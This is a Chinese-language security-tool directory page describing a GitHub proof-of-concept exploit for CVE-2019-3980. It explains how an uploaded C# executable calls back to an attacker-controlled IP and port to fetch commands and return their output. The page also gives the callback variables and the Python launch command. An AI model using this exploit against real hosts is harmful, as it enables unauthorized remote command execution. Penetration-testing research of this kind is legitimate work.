Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2019-3980 — 针对CVE-2019-3980的概念验证漏洞利用程序,通过自定义C#载荷实现远程命令执行,并利用HTTP回调进行输出检索。 | Kitploit
工具/GitHubGitHub/warferik/cve-2019-3980
Payload生成漏洞分析漏洞利用渗透测试命令与控制远程访问工具
GitHubwarferik/cve-2019-3980

CVE-2019-3980

针对CVE-2019-3980的概念验证漏洞利用程序,通过自定义C#载荷实现远程命令执行,并利用HTTP回调进行输出检索。

查看仓库
18915年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2019-3980

该仓库旨在利用 Nessus POC,配合自定义的 C# 可执行文件,在远程主机上执行命令并获取命令输出。

Python 文件用于启动一个 Web 服务器、执行漏洞利用,然后通过该 Web 服务器获取结果。
C# exe 通过漏洞利用被上传到目标主机。
当在目标上执行时,exe 会回调指定的 IP/Port 以获取要运行的命令(路径为 /cmd)。
命令执行完成后,exe 将输出发送到同一 Web 服务器。
发送输出是通过一个 GET 请求完成的,该请求会产生 404,但这没关系,我们只需要 base64 数据。

C# exe 有两个需要更新的变量:
这些变量指向攻击系统的 IP 和端口:
string ip = "10.8.0.3";
string port = "8000";


--如果更新了端口,Python 脚本也需要相应更新,Python 脚本中用于提供 HTTP 服务的变量如下: PORT = 8000
脚本启动所在的目录需要包含上传的文件以及一个名为 "cmd" 的文件,该文件包含要在 Windows 上运行的命令。

使用此脚本的步骤:
更新变量
创建 cmd 文件,写入要在易受攻击主机上运行的命令
编译 zip 文件中包含的 C# 解决方案
运行 Python 脚本:

python dameware-poc.py -t target_ip -e executable_to_upload

以下示例在远程主机上运行 net users 命令:
Alt text
Alt text

下载工具